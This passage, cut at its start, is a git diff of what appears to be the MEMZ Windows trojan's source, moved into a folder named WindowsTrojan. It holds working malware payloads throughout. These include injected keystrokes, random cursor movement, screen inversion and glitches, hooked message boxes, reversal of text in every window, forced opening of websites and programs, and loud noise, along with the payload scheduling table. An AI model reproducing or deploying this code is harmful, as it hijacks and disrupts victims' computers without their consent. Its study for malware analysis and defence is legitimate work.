= (random() % (0x5a - 0x30)) + 0x30; - SendInput(1, &input, sizeof(INPUT)); - - out: return 300 + (random() % 400); -} - -PAYLOADFUNCTIONVISUAL(payloadTunnel) { - PAYLOADHEAD - - StretchBlt(hdc, 50, 50, w - 100, h - 100, hdc, 0, 0, w, h, SRCCOPY); - - out: return 200.0 / (times / 5.0 + 1) + 4; -} - -PAYLOADFUNCTIONVISUAL(payloadDrawErrors) { - PAYLOADHEAD - - int ix = GetSystemMetrics(SM_CXICON) / 2; - int iy = GetSystemMetrics(SM_CYICON) / 2; - - POINT cursor; - GetCursorPos(&cursor); - - DrawIcon(hdc, cursor.x - ix, cursor.y - iy, LoadIcon(NULL, IDI_ERROR)); - - if (random() % (int)(10/(times/500.0+1)+1) == 0) { - DrawIcon(hdc, random()%(w-ix), random()%(h-iy), LoadIcon(NULL, IDI_WARNING)); - } - - out: return 2; -} - -PAYLOADHOST(payloadHostCrazyBus) { - PAYLOAD *payload = (PAYLOAD*)parameter; - - WAVEFORMATEX fmt = { WAVE_FORMAT_PCM, 1, 44100, 44100, 1, 8, 0 }; - - HWAVEOUT hwo; - waveOutOpen(&hwo, WAVE_MAPPER, &fmt, NULL, NULL, CALLBACK_NULL); - - const int bufsize = 44100 * 30; // 30 Seconds - char *wavedata = (char *)LocalAlloc(0, bufsize); - - 
WAVEHDR hdr = { wavedata, bufsize, 0, 0, 0, 0, 0, 0 }; - waveOutPrepareHeader(hwo, &hdr, sizeof(hdr)); - - for (;;) { -#ifdef CLEAN - if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { -#endif - int freq = 0; - for (int i = 0; i < bufsize; i++) { - if (i % (44100 / 4) == 0) - freq = 44100 / ((random() % 4000) + 1000); - - wavedata[i] = (char)(((i % freq) / ((float)freq)) * 100); - } - -#ifdef CLEAN - waveOutReset(hwo); -#endif - waveOutWrite(hwo, &hdr, sizeof(hdr)); - - while (!(hdr.dwFlags & WHDR_DONE) -#ifdef CLEAN - && (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) -#endif - ) { - Sleep(1); - } - -#ifdef CLEAN - if (!enablePayloads || SendMessage(payload->btn, BM_GETCHECK, 0, NULL) != BST_CHECKED) { - waveOutPause(hwo); - } - } else { - Sleep(10); - } -#endif - } +#include "memz.h" + +PAYLOAD payloads[] = { +#ifdef CLEAN + { payloadHostDefault, (LPVOID)payloadExecute, L"Open random websites/programs", FALSE, 0, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadCursor, L"Random cursor movement", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadKeyboard, L"Random keyboard input", FALSE, 0, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadSound, L"Random error sounds", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadInvert, L"Invert Screen", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadMessageBox, L"Message boxes", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadDrawErrors, L"Draw error icons", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadReverseText, L"Reverse text", FALSE, 0, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadTunnel, L"Tunnel effect", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadGlitches, L"Screen glitches", TRUE, 0, 0, 0, 0, 0 }, + { payloadHostCrazyBus, NULL, L"Crazy Bus (Ear Rape)", TRUE, 0, 0, 0, 0, 0 }, +#else + { payloadHostDefault, (LPVOID)payloadExecute, 30000, 0, 0, 0, 0 
}, + { payloadHostDefault, (LPVOID)payloadCursor, 30000, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadKeyboard, 20000, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadSound, 50000, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadInvert, 30000, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadMessageBox, 20000, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadDrawErrors, 10000, 0, 0, 0, 0 }, + { payloadHostDefault, (LPVOID)payloadReverseText, 40000, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadTunnel, 60000, 0, 0, 0, 0 }, + { payloadHostVisual, (LPVOID)payloadGlitches, 15000, 0, 0, 0, 0 }, + { payloadHostCrazyBus, NULL, 1000, 0, 0, 0, 0 }, +#endif +}; + +const size_t nPayloads = sizeof(payloads) / sizeof(PAYLOAD); +BOOLEAN enablePayloads = TRUE; + +PAYLOADHOST(payloadHostDefault) { + PAYLOAD *payload = (PAYLOAD*)parameter; + + for (;;) { +#ifdef CLEAN + if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { +#endif + if (payload->delaytime++ >= payload->delay) { +#ifdef CLEAN + payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE); +#else + payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime); +#endif + + payload->delaytime = 0; + } + + payload->runtime++; +#ifdef CLEAN + } else { + payload->runtime = 0; + payload->times = 0; + payload->delay = 0; + } +#endif + + Sleep(10); + } +} + +PAYLOADHOST(payloadHostVisual) { + PAYLOAD *payload = (PAYLOAD*)parameter; + + HWND hwnd = GetDesktopWindow(); + HDC hdc = GetWindowDC(hwnd); + RECT rekt; + GetWindowRect(hwnd, &rekt); + int w = rekt.right - rekt.left; + int h = rekt.bottom - rekt.top; + + for (;;) { +#ifdef CLEAN + if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { +#endif + if (payload->delaytime++ >= payload->delay) { +#ifdef CLEAN + payload->delay = 
((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE, hwnd, hdc, &rekt, w, h); +#else + payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, hwnd, hdc, &rekt, w, h); +#endif + payload->delaytime = 0; + } + + payload->runtime++; +#ifdef CLEAN + } + else { + payload->runtime = 0; + payload->times = 0; + payload->delay = 0; + } +#endif + + Sleep(10); + } +} + +PAYLOADFUNCTIONDEFAULT(payloadExecute) { + PAYLOADHEAD + + ShellExecuteA(NULL, "open", (LPCSTR)sites[random() % nSites], NULL, NULL, SW_SHOWDEFAULT); + + out: return 1500.0 / (times / 15.0 + 1) + 100 + (random() % 200); +} + +PAYLOADFUNCTIONVISUAL(payloadInvert) { + PAYLOADHEAD + + BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, NOTSRCCOPY); + + out: return 100; +} + +PAYLOADFUNCTIONDEFAULT(payloadCursor) { + PAYLOADHEAD + + POINT cursor; + GetCursorPos(&cursor); + + SetCursorPos(cursor.x + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)), cursor.y + (random() % 3 - 1) * (random() % (runtime / 2200 + 2))); + + out: return 2; +} + +PAYLOADFUNCTIONDEFAULT(payloadMessageBox) { + PAYLOADHEAD + + CreateThread(NULL, 4096, &messageBoxThread, NULL, NULL, NULL); + + out: return 2000.0 / (times / 8.0 + 1) + 20 + (random() % 30); +} + +DWORD WINAPI messageBoxThread(LPVOID parameter) { + HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId()); + MessageBoxW(NULL, L"Still using this computer?", L"lol", MB_SYSTEMMODAL | MB_OK | MB_ICONWARNING); + UnhookWindowsHookEx(hook); + + return 0; +} + +LRESULT CALLBACK msgBoxHook(int nCode, WPARAM wParam, LPARAM lParam) { + if (nCode == HCBT_CREATEWND) { + CREATESTRUCT *pcs = ((CBT_CREATEWND *)lParam)->lpcs; + + if ((pcs->style & WS_DLGFRAME) || (pcs->style & WS_POPUP)) { + HWND hwnd = (HWND)wParam; + + int x = random() % (GetSystemMetrics(SM_CXSCREEN) - pcs->cx); + int y = random() % (GetSystemMetrics(SM_CYSCREEN) - pcs->cy); + + pcs->x = x; + pcs->y = y; + } + } + + return 
CallNextHookEx(0, nCode, wParam, lParam); +} + +PAYLOADFUNCTIONDEFAULT(payloadReverseText) { + PAYLOADHEAD + + EnumChildWindows(GetDesktopWindow(), &EnumChildProc, NULL); + + out: return 50; +} + +BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) { + LPWSTR str = (LPWSTR)GlobalAlloc(GMEM_ZEROINIT, sizeof(WCHAR) * 8192); + + if (SendMessageTimeoutW(hwnd, WM_GETTEXT, 8192, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL)) { + strReverseW(str); + SendMessageTimeoutW(hwnd, WM_SETTEXT, NULL, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL); + } + + GlobalFree(str); + + return TRUE; +} + +PAYLOADFUNCTIONDEFAULT(payloadSound) { + PAYLOADHEAD + + // There seems to be a bug where toggling ALL payloads kills the sound output on some systems. + // I don't know why this happens, but using SND_SYNC seems to fix the bug. + // But the sound is not not as fast as before. I hope there is another way to fix it without slowing down the payload. + // As this only happens for the enable-disable part, I will only include that in the clean build as a workaround. 
+#ifdef CLEAN + PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_SYNC); + out: return random() % 10; +#else + PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_ASYNC); + out: return 20 + (random() % 20); +#endif +} + +PAYLOADFUNCTIONVISUAL(payloadGlitches) { + PAYLOADHEAD + + int x1 = random() % (w - 400); + int y1 = random() % (h - 400); + int x2 = random() % (w - 400); + int y2 = random() % (h - 400); + int width = random() % 400; + int height = random() % 400; + + BitBlt(hdc, x1, y1, width, height, hdc, x2, y2, SRCCOPY); + + out: return 200.0 / (times / 5.0 + 1) + 3; +} + +PAYLOADFUNCTIONDEFAULT(payloadKeyboard) { + PAYLOADHEAD + + INPUT input; + + input.type = INPUT_KEYBOARD; + input.ki.wVk = (random() % (0x5a - 0x30)) + 0x30; + SendInput(1, &input, sizeof(INPUT)); + + out: return 300 + (random() % 400); +} + +PAYLOADFUNCTIONVISUAL(payloadTunnel) { + PAYLOADHEAD + + StretchBlt(hdc, 50, 50, w - 100, h - 100, hdc, 0, 0, w, h, SRCCOPY); + + out: return 200.0 / (times / 5.0 + 1) + 4; +} + +PAYLOADFUNCTIONVISUAL(payloadDrawErrors) { + PAYLOADHEAD + + int ix = GetSystemMetrics(SM_CXICON) / 2; + int iy = GetSystemMetrics(SM_CYICON) / 2; + + POINT cursor; + GetCursorPos(&cursor); + + DrawIcon(hdc, cursor.x - ix, cursor.y - iy, LoadIcon(NULL, IDI_ERROR)); + + if (random() % (int)(10/(times/500.0+1)+1) == 0) { + DrawIcon(hdc, random()%(w-ix), random()%(h-iy), LoadIcon(NULL, IDI_WARNING)); + } + + out: return 2; +} + +PAYLOADHOST(payloadHostCrazyBus) { + PAYLOAD *payload = (PAYLOAD*)parameter; + + WAVEFORMATEX fmt = { WAVE_FORMAT_PCM, 1, 44100, 44100, 1, 8, 0 }; + + HWAVEOUT hwo; + waveOutOpen(&hwo, WAVE_MAPPER, &fmt, NULL, NULL, CALLBACK_NULL); + + const int bufsize = 44100 * 30; // 30 Seconds + char *wavedata = (char *)LocalAlloc(0, bufsize); + + WAVEHDR hdr = { wavedata, bufsize, 0, 0, 0, 0, 0, 0 }; + waveOutPrepareHeader(hwo, &hdr, sizeof(hdr)); + + for (;;) { +#ifdef CLEAN + if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 
0, NULL) == BST_CHECKED) { +#endif + int freq = 0; + for (int i = 0; i < bufsize; i++) { + if (i % (44100 / 4) == 0) + freq = 44100 / ((random() % 4000) + 1000); + + wavedata[i] = (char)(((i % freq) / ((float)freq)) * 100); + } + +#ifdef CLEAN + waveOutReset(hwo); +#endif + waveOutWrite(hwo, &hdr, sizeof(hdr)); + + while (!(hdr.dwFlags & WHDR_DONE) +#ifdef CLEAN + && (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) +#endif + ) { + Sleep(1); + } + +#ifdef CLEAN + if (!enablePayloads || SendMessage(payload->btn, BM_GETCHECK, 0, NULL) != BST_CHECKED) { + waveOutPause(hwo); + } + } else { + Sleep(10); + } +#endif + } } \ No newline at end of file diff --git a/VCProject/MEMZ/payloads.h b/WindowsTrojan/MEMZ/payloads.h similarity index 96% rename from VCProject/MEMZ/payloads.h rename to WindowsTrojan/MEMZ/payloads.h index 1aebe24..d20057f 100644 --- a/VCProject/MEMZ/payloads.h +++ b/WindowsTrojan/MEMZ/payloads.h 
@@ -1,33 +1,33 @@
-#pragma once
-#include "memz.h"
-
-#define PAYLOADHOST(name) DWORD (WINAPI name)(LPVOID parameter)
-
-typedef struct {
- PAYLOADHOST(*payloadHost);
- void *payloadFunction;
-
-#ifdef CLEAN
- wchar_t *name;
- BOOLEAN safe;
-
- HWND btn;
- int delaytime, delay, runtime, times;
-#else
- int startDelay;
- int delaytime, delay, runtime, times;
-#endif
-} PAYLOAD;
-
-#ifdef CLEAN
-#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime, BOOLEAN skip)
-#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, BOOLEAN skip, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
-#define PAYLOADHEAD if (skip) goto out;
-#else
-#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime)
-#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
-#define PAYLOADHEAD
-#endif
-
-extern PAYLOAD payloads[];
+#pragma once
+#include "memz.h"
+
+#define PAYLOADHOST(name) DWORD (WINAPI name)(LPVOID parameter)
+
+typedef struct {
+ PAYLOADHOST(*payloadHost);
+ void *payloadFunction;
+
+#ifdef CLEAN
+ wchar_t *name;
+ BOOLEAN safe;
+
+ HWND btn;
+ int delaytime, delay, runtime, times;
+#else
+ int startDelay;
+ int delaytime, delay, runtime, times;
+#endif
+} PAYLOAD;
+
+#ifdef CLEAN
+#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime, BOOLEAN skip)
+#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, BOOLEAN skip, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
+#define PAYLOADHEAD if (skip) goto out;
+#else
+#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime)
+#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
+#define PAYLOADHEAD
+#endif
+
+extern PAYLOAD payloads[];
 extern const size_t nPayloads;
\ No newline at end of file
diff --git a/VCProject/MEMZ/utils.cpp b/WindowsTrojan/MEMZ/utils.cpp
similarity index 94%
rename from VCProject/MEMZ/utils.cpp
rename to WindowsTrojan/MEMZ/utils.cpp
index 2b5bd59..852b83f 100644
--- a/VCProject/MEMZ/utils.cpp
+++ b/WindowsTrojan/MEMZ/utils.cpp
@@ -1,36 +1,36 @@
-#include "memz.h"
-
-HCRYPTPROV prov;
-
-int random() {
- if (prov == NULL)
- if (!CryptAcquireContext(&prov, NULL, NULL, PROV_RSA_FULL, CRYPT_SILENT | CRYPT_VERIFYCONTEXT))
- ExitProcess(1);
-
- int out;
- CryptGenRandom(prov, sizeof(out), (BYTE *)(&out));
- return out & 0x7fffffff;
-}
-
-void strReverseW(LPWSTR str) {
- int len = lstrlenW(str);
-
- if (len <= 1)
- return;
-
- WCHAR c;
- int i, j;
- for (i = 0, j = len - 1; i < j; i++, j--) {
- c = str[i];
- str[i] = str[j];
- str[j] = c;
- }
-
- // Fix Newlines
- for (i = 0; i < len - 1; i++) {
- if (str[i] == L'\n' && str[i + 1] == L'\r') {
- str[i] = L'\r';
- str[i + 1] = L'\n';
- }
- }
+#include "memz.h"
+
+HCRYPTPROV prov;
+
+int random() {
+ if (prov == NULL)
+ if (!CryptAcquireContext(&prov, NULL, NULL, PROV_RSA_FULL, CRYPT_SILENT | CRYPT_VERIFYCONTEXT))
+ ExitProcess(1);
+
+ int out;
+ CryptGenRandom(prov, sizeof(out), (BYTE *)(&out));
+ return out & 0x7fffffff;
+}
+
+void strReverseW(LPWSTR str) {
+ int len = lstrlenW(str);
+
+ if (len <= 1)
+ return;
+
+ WCHAR c;
+ int i, j;
+ for (i = 0, j = len - 1; i < j; i++, j--) {
+ c = str[i];
+ str[i] = str[j];
+ str[j] = c;
+ }
+
+ // Fix Newlines
+ for (i = 0; i < len - 1; i++) {
+ if (str[i] == L'\n' && str[i + 1] == L'\r') {
+ str[i] = L'\r';
+ str[i + 1] = L'\n';
+ }
+ }
 }
\ No newline at end of file
diff --git a/VCProject/MEMZ/win32_crt_float.cpp b/WindowsTrojan/MEMZ/win32_crt_float.cpp
similarity index 100%
rename from VCProject/MEMZ/win32_crt_float.cpp
rename to WindowsTrojan/MEMZ/win32_crt_float.cpp
